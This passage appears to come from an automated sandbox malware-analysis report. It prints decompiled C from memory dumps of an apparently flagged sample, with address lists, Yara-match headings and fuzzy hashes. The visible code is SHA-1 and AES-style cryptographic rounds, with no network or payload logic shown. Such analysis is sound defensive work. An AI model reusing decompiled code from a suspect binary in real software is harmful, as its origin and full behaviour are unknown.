                                                                                                                                                    					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                                                                                                    				} while ( *_t46 != 0);
                                                                                                                                                    				_t320 =  *_t481;
                                                                                                                                                    				_t279 = _t481[1];
                                                                                                                                                    				_t358 = _t481[2];
                                                                                                                                                    				_t404 = _t481[3];
                                                                                                                                                    				_v12 = _t320;
                                                                                                                                                    				_v16 = _t481[4];
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol ebx, 0x5");
                                                                                                                                                    					_t462 = _v8;
                                                                                                                                                    					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t323 = _v12;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_v12 = _t488;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v8 = _t358;
                                                                                                                                                    					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t491 = _t279;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t362 = _v12;
                                                                                                                                                    					_v8 = _t323;
                                                                                                                                                    					_t325 = _v8;
                                                                                                                                                    					_v12 = _t410;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t413 = _v12;
                                                                                                                                                    					_v16 = _t491;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t362;
                                                                                                                                                    					_v12 = _t285;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t325;
                                                                                                                                                    					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_t288 = _v8;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t413;
                                                                                                                                                    					_v12 = _t496;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t288;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t404 = _v8;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t463 = _t462 + 5;
                                                                                                                                                    					_t320 = _t499;
                                                                                                                                                    					_v12 = _t320;
                                                                                                                                                    					_v8 = _t463;
                                                                                                                                                    				} while (_t463 < 0x14);
                                                                                                                                                    				_t464 = 0x14;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t334 = _v12;
                                                                                                                                                    					_v12 = _t502;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t505 = _t279;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t365 = _v12;
                                                                                                                                                    					_v12 = _t420;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t423 = _v12;
                                                                                                                                                    					_v8 = _t334;
                                                                                                                                                    					_v8 = _t365;
                                                                                                                                                    					_v12 = _t292;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_t464 = _t464 + 5;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                                                                                                    					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                                                                                                    					_t295 = _v8;
                                                                                                                                                    					_v8 = _t423;
                                                                                                                                                    					_v12 = _t506;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t404 = _v8;
                                                                                                                                                    					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                                                                                                    					_v16 = _t295;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    				} while (_t464 < 0x28);
                                                                                                                                                    				_v8 = 0x28;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                                                                                                    					_t470 = _v12;
                                                                                                                                                    					_v12 = _t510;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t340 = _v8;
                                                                                                                                                    					asm("ror edi, 0x2");
                                                                                                                                                    					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t369 = _v12;
                                                                                                                                                    					_v12 = _t432;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v8 = _t279;
                                                                                                                                                    					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t299 = _v12;
                                                                                                                                                    					_v8 = _t470;
                                                                                                                                                    					_v12 = _t434;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t437 = _t369;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_v8 = _t437;
                                                                                                                                                    					_v12 = _t522;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                                                                                                    					_t404 = _t299;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    					_t341 = _t340 + 5;
                                                                                                                                                    					_v8 = _t341;
                                                                                                                                                    				} while (_t341 < 0x3c);
                                                                                                                                                    				_t478 = 0x3c;
                                                                                                                                                    				_v8 = 0x3c;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t479 = _v8;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t346 = _v12;
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_v12 = _t525;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t370 = _v12;
                                                                                                                                                    					_v12 = _t445;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v16 = _t279;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t404 = _v12;
                                                                                                                                                    					_v12 = _t303;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t346;
                                                                                                                                                    					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t305 = _t370;
                                                                                                                                                    					_v8 = _t346;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t370;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_v12 = _t532;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t478 = _t479 + 5;
                                                                                                                                                    					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t305;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t404;
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    					_v8 = _t478;
                                                                                                                                                    				} while (_t478 < 0x50);
                                                                                                                                                    				_t480 = _a4;
                                                                                                                                                    				_t480[2] = _t480[2] + _t358;
                                                                                                                                                    				_t480[3] = _t480[3] + _t404;
                                                                                                                                                    				_t311 = _t480[4] + _v16;
                                                                                                                                                    				 *_t480 =  *_t480 + _t499;
                                                                                                                                                    				_t480[1] = _t480[1] + _t279;
                                                                                                                                                    				_t480[4] = _t311;
                                                                                                                                                    				_t480[0x17] = 0;
                                                                                                                                                    				return _t311;
                                                                                                                                                    			}
                                                                                                                                                    0x00408e6a
                                                                                                                                                    0x00408e6d
                                                                                                                                                    0x00408e76
                                                                                                                                                    0x00408e87
                                                                                                                                                    0x00408e8a
                                                                                                                                                    0x00408e8d
                                                                                                                                                    0x00408e94
                                                                                                                                                    0x00408e97
                                                                                                                                                    0x00408e9a
                                                                                                                                                    0x00408e9d
                                                                                                                                                    0x00408e9f
                                                                                                                                                    0x00408ea2
                                                                                                                                                    0x00408ea5
                                                                                                                                                    0x00408eae
                                                                                                                                                    0x00408eb3
                                                                                                                                                    0x00408eb3
                                                                                                                                                    0x00408ec8
                                                                                                                                                    0x00408ecb
                                                                                                                                                    0x00408ece
                                                                                                                                                    0x00408ed5
                                                                                                                                                    0x00408ed8
                                                                                                                                                    0x00408edb
                                                                                                                                                    0x00408ef0
                                                                                                                                                    0x00408ef7
                                                                                                                                                    0x00408efa
                                                                                                                                                    0x00408efe
                                                                                                                                                    0x00408f01
                                                                                                                                                    0x00408f06
                                                                                                                                                    0x00408f09
                                                                                                                                                    0x00408f18
                                                                                                                                                    0x00408f1b
                                                                                                                                                    0x00408f22
                                                                                                                                                    0x00408f25
                                                                                                                                                    0x00408f28
                                                                                                                                                    0x00408f2b
                                                                                                                                                    0x00408f2e
                                                                                                                                                    0x00408f36
                                                                                                                                                    0x00408f44
                                                                                                                                                    0x00408f47
                                                                                                                                                    0x00408f4a
                                                                                                                                                    0x00408f4a
                                                                                                                                                    0x00408f51
                                                                                                                                                    0x00408f54
                                                                                                                                                    0x00408f57
                                                                                                                                                    0x00408f5f
                                                                                                                                                    0x00408f6d
                                                                                                                                                    0x00408f70
                                                                                                                                                    0x00408f77
                                                                                                                                                    0x00408f7a
                                                                                                                                                    0x00408f7d
                                                                                                                                                    0x00408f80
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f8c
                                                                                                                                                    0x00408f93
                                                                                                                                                    0x00408f93
                                                                                                                                                    0x00408f99
                                                                                                                                                    0x00408fb2
                                                                                                                                                    0x00408fb5
                                                                                                                                                    0x00408fbc
                                                                                                                                                    0x00408fbf
                                                                                                                                                    0x00408fc2
                                                                                                                                                    0x00408fd4
                                                                                                                                                    0x00408fde
                                                                                                                                                    0x00408fe1
                                                                                                                                                    0x00408fea
                                                                                                                                                    0x00408fed
                                                                                                                                                    0x00408ff4
                                                                                                                                                    0x00408ff7
                                                                                                                                                    0x00408ffd
                                                                                                                                                    0x00409010
                                                                                                                                                    0x00409017
                                                                                                                                                    0x0040901a
                                                                                                                                                    0x0040901d
                                                                                                                                                    0x00409020
                                                                                                                                                    0x00409029
                                                                                                                                                    0x0040902c
                                                                                                                                                    0x0040903f
                                                                                                                                                    0x00409042
                                                                                                                                                    0x0040904c
                                                                                                                                                    0x0040904f
                                                                                                                                                    0x00409051
                                                                                                                                                    0x0040905a
                                                                                                                                                    0x0040905d
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409076
                                                                                                                                                    0x00409079
                                                                                                                                                    0x00409080
                                                                                                                                                    0x00409082
                                                                                                                                                    0x00409085
                                                                                                                                                    0x00409088
                                                                                                                                                    0x0040908b
                                                                                                                                                    0x0040908e
                                                                                                                                                    0x00409091
                                                                                                                                                    0x0040909a
                                                                                                                                                    0x0040909f
                                                                                                                                                    0x004090a2
                                                                                                                                                    0x004090a2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090c2
                                                                                                                                                    0x004090c5
                                                                                                                                                    0x004090c8
                                                                                                                                                    0x004090cb
                                                                                                                                                    0x004090de
                                                                                                                                                    0x004090e1
                                                                                                                                                    0x004090ec
                                                                                                                                                    0x004090ef
                                                                                                                                                    0x004090fb
                                                                                                                                                    0x004090fe
                                                                                                                                                    0x00409104
                                                                                                                                                    0x00409107
                                                                                                                                                    0x0040910a
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409121
                                                                                                                                                    0x00409124
                                                                                                                                                    0x0040912a
                                                                                                                                                    0x0040912d
                                                                                                                                                    0x00409134
                                                                                                                                                    0x00409136
                                                                                                                                                    0x00409139
                                                                                                                                                    0x0040913c
                                                                                                                                                    0x0040913f
                                                                                                                                                    0x00409142
                                                                                                                                                    0x00409149
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x00409162
                                                                                                                                                    0x00409165
                                                                                                                                                    0x00409168
                                                                                                                                                    0x0040916b
                                                                                                                                                    0x0040916e
                                                                                                                                                    0x00409171
                                                                                                                                                    0x00409174
                                                                                                                                                    0x0040917d
                                                                                                                                                    0x0040918e
                                                                                                                                                    0x00409196
                                                                                                                                                    0x0040919c
                                                                                                                                                    0x0040919f
                                                                                                                                                    0x004091a1
                                                                                                                                                    0x004091a4
                                                                                                                                                    0x004091a7
                                                                                                                                                    0x004091b4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: 24c657dbf3089fcbc3069487bc2d4dcf8c450b22064808c1fb65845edcaa17d0
                                                                                                                                                    • Instruction ID: 5a13112b5b60793b016dad8c01efd7471f1a7678a229c8b43cf1ae29a91c0be4
                                                                                                                                                    • Opcode Fuzzy Hash: 24c657dbf3089fcbc3069487bc2d4dcf8c450b22064808c1fb65845edcaa17d0
                                                                                                                                                    • Instruction Fuzzy Hash: 7CA1F471A142597ADF28DF60CC51BFE37A9AB89300F0444A9F98ADB1D1CA78CD90DB21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp

                                                                                                                                                    C-Code - Quality: 26%
                                                                                                                                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				void* _t273;
                                                                                                                                                    				signed int _t274;
                                                                                                                                                    				signed int _t282;
                                                                                                                                                    				signed int* _t358;
                                                                                                                                                    				signed int _t383;
                                                                                                                                                    				signed int* _t409;
                                                                                                                                                    				signed int _t429;
                                                                                                                                                    				signed int _t458;
                                                                                                                                                    				signed int _t478;
                                                                                                                                                    				signed int _t560;
                                                                                                                                                    				signed int _t603;
                                                                                                                                                    
                                                                                                                                                    				_t273 = __eax;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_v20 = _t458;
                                                                                                                                                    				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                                                                                                                    				asm("ror edx, 0x10");
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_v24 = _t282;
                                                                                                                                                    				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                                                                                                                    				asm("ror esi, 0x10");
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol ebx, 0x8");
                                                                                                                                                    				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("ror edi, 0x10");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                                                                                                                    				asm("ror edi, 0x10");
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol ebx, 0x8");
                                                                                                                                                    				_t409 =  &(__ecx[8]);
                                                                                                                                                    				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                    				_t478 = (_a4 >> 1) - 1;
                                                                                                                                                    				_a4 = _t478;
                                                                                                                                                    				if(_t478 != 0) {
                                                                                                                                                    					do {
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("rol edi, 0x8");
                                                                                                                                                    						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror edx, 0x8");
                                                                                                                                                    						asm("rol edx, 0x8");
                                                                                                                                                    						_v24 = _t383;
                                                                                                                                                    						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                                                                                                                                    						asm("ror edx, 0x10");
                                                                                                                                                    						asm("ror esi, 0x8");
                                                                                                                                                    						asm("rol esi, 0x8");
                                                                                                                                                    						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                                                                                                                                    						asm("ror esi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                                                                                                                                    						_v12 = _t560;
                                                                                                                                                    						asm("ror edi, 0x8");
                                                                                                                                                    						asm("ror ebx, 0x10");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                                                                                                                                    						asm("ror ebx, 0x10");
                                                                                                                                                    						asm("ror edi, 0x8");
                                                                                                                                                    						asm("rol edi, 0x8");
                                                                                                                                                    						_t409 =  &(_t409[8]);
                                                                                                                                                    						_t205 =  &_a4;
                                                                                                                                                    						 *_t205 = _a4 - 1;
                                                                                                                                                    						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                    					} while ( *_t205 != 0);
                                                                                                                                                    				}
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
